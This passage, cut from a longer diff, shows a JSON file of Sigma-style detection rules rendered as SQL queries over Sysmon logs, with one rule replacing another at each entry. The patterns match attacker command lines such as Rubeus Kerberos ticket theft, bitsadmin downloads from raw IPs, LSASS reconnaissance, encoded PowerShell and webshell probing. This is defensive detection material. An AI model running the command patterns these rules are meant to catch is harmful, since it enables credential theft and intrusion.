'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%SysAidServer%' ESCAPE '\\')" ], - "filename": "proc_creation_win_net_use_mount_share.yml" + "filename": "proc_creation_win_java_sysaidserver_susp_child_process.yml" }, { - "title": "Suspicious DLL Loaded via CertOC.EXE", - "id": "84232095-ecca-4015-b0d7-7726507ee793", - "status": "experimental", - "description": "Detects when a user installs certificates by using CertOC.exe to load the target DLL file.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "New ActiveScriptEventConsumer Created Via Wmic.EXE", + "id": "ebef4391-1a81-4761-a40a-1db446c0e625", + "status": "test", + "description": "Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.t1546.003" ], "falsepositives": [ - "Unknown" + "Legitimate software creating script event consumers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%ActiveScriptEventConsumer%' ESCAPE '\\' AND CommandLine LIKE '% CREATE %' 
ESCAPE '\\')" ], - "filename": "proc_creation_win_certoc_load_dll_susp_locations.yml" + "filename": "proc_creation_win_wmic_eventconsumer_creation.yml" }, { - "title": "Suspicious VBoxDrvInst.exe Parameters", - "id": "b7b19cb6-9b32-4fc4-a108-73f19acfe262", - "status": "test", - "description": "Detect VBoxDrvInst.exe run with parameters allowing processing INF file.\nThis allows to create values in the registry and install drivers.\nFor example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys\n", - "author": "Konstantin Grishchenko, oscd.community", + "title": "Suspicious Download From Direct IP Via Bitsadmin", + "id": "99c840f2-2012-46fd-9141-c761987550ef", + "status": "experimental", + "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ - "Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\VBoxDrvInst.exe' ESCAPE '\\' AND CommandLine LIKE '%driver%' ESCAPE '\\' AND CommandLine LIKE '%executeinf%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR 
CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_virtualbox_vboxdrvinst_execution.yml" + "filename": "proc_creation_win_bitsadmin_download_direct_ip.yml" }, { - "title": "UAC Bypass Tools Using ComputerDefaults", - "id": "3c05e90d-7eba-4324-9972-5d7f711a60a8", + "title": "New Process Created Via Wmic.EXE", + "id": "526be59f-a573-4eea-b5f7-f0973207634d", "status": "test", - "description": "Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects new process creation using WMIC via the \"process call create\" flag", + "author": "Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.execution", + "attack.t1047", + "car.2016-03-002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (IntegrityLevel IN ('High', 'System') AND Image LIKE 'C:\\\\Windows\\\\System32\\\\ComputerDefaults.exe' ESCAPE '\\') AND NOT ((ParentImage LIKE '%:\\\\Windows\\\\System32%' ESCAPE '\\' OR ParentImage LIKE '%:\\\\Program Files%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_computerdefaults.yml" + "filename": "proc_creation_win_wmic_process_creation.yml" }, { - "title": "HackTool - Rubeus Execution", - "id": 
"7ec2c172-dceb-4c10-92c9-87c1881b7e18", - "status": "stable", - "description": "Detects the execution of the hacktool Rubeus via PE information of command line parameters", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential RDP Session Hijacking Activity", + "id": "224f140f-3553-4cd1-af78-13d81bf9f7cc", + "status": "experimental", + "description": "Detects potential RDP Session Hijacking activity on Windows systems", + "author": "@juju4", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1558.003", - "attack.lateral_movement", - "attack.t1550.003" + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Administrative activity" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Rubeus.exe' ESCAPE '\\' OR OriginalFileName = 'Rubeus.exe' OR Description = 'Rubeus' OR (CommandLine LIKE '% asreproast %' ESCAPE '\\' OR CommandLine LIKE '% dump /service:krbtgt %' ESCAPE '\\' OR CommandLine LIKE '% dump /luid:0x%' ESCAPE '\\' OR CommandLine LIKE '% kerberoast %' ESCAPE '\\' OR CommandLine LIKE '% createnetonly /program:%' ESCAPE '\\' OR CommandLine LIKE '% ptt /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% /impersonateuser:%' ESCAPE '\\' OR CommandLine LIKE '% renew /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% asktgt /user:%' ESCAPE '\\' OR CommandLine LIKE '% harvest /interval:%' ESCAPE '\\' OR CommandLine LIKE '% s4u /user:%' ESCAPE '\\' OR CommandLine LIKE '% s4u /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% hash /password:%' ESCAPE '\\' OR CommandLine LIKE '% golden /aes256:%' ESCAPE '\\' OR CommandLine LIKE '% silver /user:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\tscon.exe' ESCAPE '\\' OR OriginalFileName = 'tscon.exe') AND IntegrityLevel = 'SYSTEM')" ], - "filename": "proc_creation_win_hktl_rubeus.yml" + 
"filename": "proc_creation_win_tscon_rdp_session_hijacking.yml" }, { - "title": "Potential Russian APT Credential Theft Activity", - "id": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee", - "status": "stable", - "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Rundll32 Activity", + "id": "e593cf51-88db-4ee1-b920-37e89012a3c9", + "status": "test", + "description": "Detects suspicious process related to rundll32 based on arguments", + "author": "juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali", "tags": [ - "attack.credential_access", - "attack.t1552.001", - "attack.t1003.003" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Unlikely" + "False positives depend on scripts and administrative tools used in the monitored environment" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%xcopy /S /E /C /Q /H \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%adexplorer -snapshot \"\" c:\\\\users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\downloads\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.snp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%javascript:%' ESCAPE '\\' AND CommandLine LIKE '%.RegisterXLL%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURLA%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%FileProtocolHandler%' ESCAPE '\\') OR (CommandLine LIKE '%zipfldr.dll%' ESCAPE '\\' AND CommandLine LIKE '%RouteTheCall%' ESCAPE '\\') OR (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND 
CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\') OR (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\') OR (CommandLine LIKE '%mshtml.dll%' ESCAPE '\\' AND CommandLine LIKE '%PrintHTML%' ESCAPE '\\') OR (CommandLine LIKE '%advpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchINFSection%' ESCAPE '\\') OR (CommandLine LIKE '%advpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%RegisterOCX%' ESCAPE '\\') OR (CommandLine LIKE '%ieadvpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchINFSection%' ESCAPE '\\') OR (CommandLine LIKE '%ieadvpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%RegisterOCX%' ESCAPE '\\') OR (CommandLine LIKE '%ieframe.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%shdocvw.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%syssetup.dll%' ESCAPE '\\' AND CommandLine LIKE '%SetupInfObjectInstallAction%' ESCAPE '\\') OR (CommandLine LIKE '%setupapi.dll%' ESCAPE '\\' AND CommandLine LIKE '%InstallHinfSection%' ESCAPE '\\') OR (CommandLine LIKE '%pcwutl.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchApplication%' ESCAPE '\\') OR (CommandLine LIKE '%dfshim.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShOpenVerbApplication%' ESCAPE '\\') OR (CommandLine LIKE '%dfshim.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShOpenVerbShortcut%' ESCAPE '\\') OR (CommandLine LIKE '%scrobj.dll%' ESCAPE '\\' AND CommandLine LIKE '%GenerateTypeLib%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\') OR (CommandLine LIKE '%shimgvw.dll%' ESCAPE '\\' AND CommandLine LIKE '%ImageView\\_Fullscreen%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%shell32.dll,Control\\_RunDLL desk.cpl,screensaver,@screensaver%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\' 
AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\rundll32.exe\" Shell32.dll,Control\\_RunDLL \"C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.cpl\",' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_bear_activity_gtr19.yml" + "filename": "proc_creation_win_rundll32_susp_activity.yml" }, { - "title": "Findstr LSASS", - "id": "fe63010f-8823-4864-a96b-a7b4a0f7b929", - "status": "experimental", - "description": "Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID", - "author": "Florian Roth (Nextron Systems)", + "title": "Certificate Exported Via Certutil.EXE", + "id": "3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5", + "status": "test", + "description": "Detects the execution of the certutil with the \"exportPFX\" flag which allows the utility to export certificates.", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.006" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ - "Unknown" + "There legitimate reasons to export certificates. 
Investigate the activity to determine if it's benign" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%lsass%' ESCAPE '\\') OR (CommandLine LIKE '% /i lsass.exe%' ESCAPE '\\' OR CommandLine LIKE '% /i \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe \"lsass%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-exportPFX %' ESCAPE '\\' OR CommandLine LIKE '%/exportPFX %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_findstr_lsass.yml" + "filename": "proc_creation_win_certutil_export_pfx.yml" }, { - "title": "Suspicious High IntegrityLevel Conhost Legacy Option", - "id": "3037d961-21e9-4732-b27a-637bcc7bf539", - "status": "experimental", - "description": "ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. 
High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context.", - "author": "frack113", + "title": "Permission Check Via Accesschk.EXE", + "id": "c625d754-6a3d-4f65-9c9a-536aea960d37", + "status": "test", + "description": "Detects the usage of the \"Accesschk\" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges", + "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.discovery", + "attack.t1069.001" ], "falsepositives": [ - "Very Likely, including launching cmd.exe via Run As Administrator" + "System administrator Usage" ], - "level": "informational", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel = 'High' AND CommandLine LIKE '%conhost.exe%' ESCAPE '\\' AND CommandLine LIKE '%0xffffffff%' ESCAPE '\\' AND CommandLine LIKE '%-ForceV1%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product LIKE '%AccessChk' ESCAPE '\\' OR Description LIKE '%Reports effective permissions%' ESCAPE '\\' OR (Image LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR Image LIKE '%\\\\accesschk64.exe' ESCAPE '\\') OR OriginalFileName = 'accesschk.exe') AND (CommandLine LIKE '%uwcqv %' ESCAPE '\\' OR CommandLine LIKE '%kwsu %' ESCAPE '\\' OR CommandLine LIKE '%qwsu %' ESCAPE '\\' OR CommandLine LIKE '%uwdqs %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_conhost_legacy_option.yml" + "filename": "proc_creation_win_sysinternals_accesschk_check_permissions.yml" }, { - "title": "New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE", - "id": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", + "title": "ETW Logging Tamper In .NET Processes", + "id": "41421f44-58f9-455d-838a-c398859841d4", 
"status": "test", - "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects changes to environment variables related to ETW logging. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" + "attack.t1562" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/config%' ESCAPE '\\' AND CommandLine LIKE '%/serverlevelplugindll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%COMPlus\\_ETWEnabled%' ESCAPE '\\' OR CommandLine LIKE '%COMPlus\\_ETWFlags%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml" + "filename": "proc_creation_win_susp_etw_modification_cmdline.yml" }, { - "title": "PowerShell Base64 Encoded FromBase64String Keyword", - "id": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", - "status": "test", - "description": "Detects usage of a base64 encoded \"FromBase64String\" cmdlet in a process command line", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Git Clone", + "id": "aef9d1f1-7396-4e92-a927-4567c7a495c1", + "status": "experimental", + "description": "Detects execution of \"git\" in order to clone a remote repository that contain suspicious keywords which might be suspicious", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1140", - "attack.execution", - 
"attack.t1059.001" + "attack.reconnaissance", + "attack.t1593.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%OjpGcm9tQmFzZTY0U3RyaW5n%' ESCAPE '\\' OR CommandLine LIKE '%o6RnJvbUJhc2U2NFN0cmluZ%' ESCAPE '\\' OR CommandLine LIKE '%6OkZyb21CYXNlNjRTdHJpbm%' ESCAPE '\\' OR (CommandLine LIKE '%OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA%' ESCAPE '\\' OR CommandLine LIKE '%oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\git.exe' ESCAPE '\\' OR Image LIKE '%\\\\git-remote-https.exe' ESCAPE '\\') OR OriginalFileName = 'git.exe') AND (CommandLine LIKE '% clone %' ESCAPE '\\' OR CommandLine LIKE '%git-remote-https %' ESCAPE '\\') AND (CommandLine LIKE '%exploit%' ESCAPE '\\' OR CommandLine LIKE '%Vulns%' ESCAPE '\\' OR CommandLine LIKE '%vulnerability%' ESCAPE '\\' OR CommandLine LIKE '%RemoteCodeExecution%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%CVE-%' ESCAPE '\\' OR CommandLine LIKE '%poc-%' ESCAPE '\\' OR CommandLine LIKE '%ProofOfConcept%' ESCAPE '\\' OR CommandLine LIKE '%proxyshell%' ESCAPE '\\' OR CommandLine LIKE '%log4shell%' ESCAPE '\\' OR CommandLine LIKE '%eternalblue%' ESCAPE '\\' OR CommandLine LIKE '%eternal-blue%' ESCAPE '\\' OR CommandLine LIKE '%MS17-%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_base64_frombase64string.yml" + "filename": "proc_creation_win_git_susp_clone.yml" }, { - "title": "PUA - Mouse Lock Execution", - "id": "c9192ad9-75e5-43eb-8647-82a0a5b493e3", + "title": "Verclsid.exe Runs COM Object", + "id": "d06be4b9-8045-428b-a567-740a26d9db25", "status": "test", - "description": "In Kaspersky's 2020 
Incident Response Analyst Report they listed legitimate tool \"Mouse Lock\" as being used for both credential access and collection in security incidents.", - "author": "Cian Heasley", + "description": "Detects when verclsid.exe is used to run COM object via GUID", + "author": "Victor Sergeev, oscd.community", "tags": [ - "attack.credential_access", - "attack.collection", - "attack.t1056.002" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate uses of Mouse Lock software" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product LIKE '%Mouse Lock%' ESCAPE '\\' OR Company LIKE '%Misc314%' ESCAPE '\\' OR CommandLine LIKE '%Mouse Lock\\_%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR OriginalFileName = 'verclsid.exe') AND (CommandLine LIKE '%/S%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_mouselock_execution.yml" + "filename": "proc_creation_win_verclsid_runs_com.yml" }, { - "title": "APT27 - Emissary Panda Activity", - "id": "9aa01d62-7667-4d3b-acb8-8cb5103e2014", - "status": "test", - "description": "Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential File Overwrite Via Sysinternals SDelete", + "id": "a4824fca-976f-4964-b334-0621379e84c4", + "status": "experimental", + "description": "Detects the use of SDelete to erase a file not the free space", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.g0027" + "attack.impact", + "attack.t1485" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\sllauncher.exe' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%-k%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'sdelete.exe' AND NOT ((CommandLine LIKE '% -h%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% -z%' ESCAPE '\\' OR CommandLine LIKE '% /\\?%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_apt27_emissary_panda.yml" + "filename": "proc_creation_win_sysinternals_sdelete.yml" }, { - "title": "WinDbg/CDB LOLBIN Usage", - "id": "b5c7395f-e501-4a08-94d4-57fe7a9da9d2", - "status": "test", - "description": "Detects usage of \"cdb.exe\" to launch 64-bit shellcode or arbitrary processes or commands from a debugger script file", - "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali", + "title": "SyncAppvPublishingServer Execute Arbitrary PowerShell Code", + "id": "fbd7c32d-db2a-4418-b92c-566eb8911133", + "status": "experimental", + "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1106", "attack.defense_evasion", - "attack.t1218", - "attack.t1127" + "attack.t1218" ], "falsepositives": [ - "Legitimate use of debugging tools" + "App-V clients" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cdb.exe' ESCAPE '\\' OR OriginalFileName = 'CDB.Exe') AND (CommandLine LIKE '% -c %' ESCAPE '\\' OR CommandLine LIKE '% -cf %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SyncAppvPublishingServer.exe' ESCAPE '\\' OR OriginalFileName = 
'syncappvpublishingserver.exe') AND CommandLine LIKE '%\"n; %' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_cdb.yml" + "filename": "proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml" }, { - "title": "Webshell Recon Detection Via CommandLine & Processes", - "id": "f64e5c19-879c-4bae-b471-6d84c8339677", - "status": "test", - "description": "Detects processes spawned from web servers (php, tomcat, iis...etc) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands", - "author": "Cian Heasley, Florian Roth", + "title": "Suspicious PowerShell Encoded Command Patterns", + "id": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", + "status": "experimental", + "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Other tools that work with encoded scripts in the command line instead of script files" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' 
ESCAPE '\\'))) AND (CommandLine LIKE '%perl --help%' ESCAPE '\\' OR CommandLine LIKE '%python --help%' ESCAPE '\\' OR CommandLine LIKE '%python -h%' ESCAPE '\\' OR CommandLine LIKE '%python3 --help%' ESCAPE '\\' OR CommandLine LIKE '%python3 -h%' ESCAPE '\\' OR CommandLine LIKE '%wget --help%' ESCAPE '\\' OR CommandLine LIKE '%perl -h%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\') AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% PAA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\')) 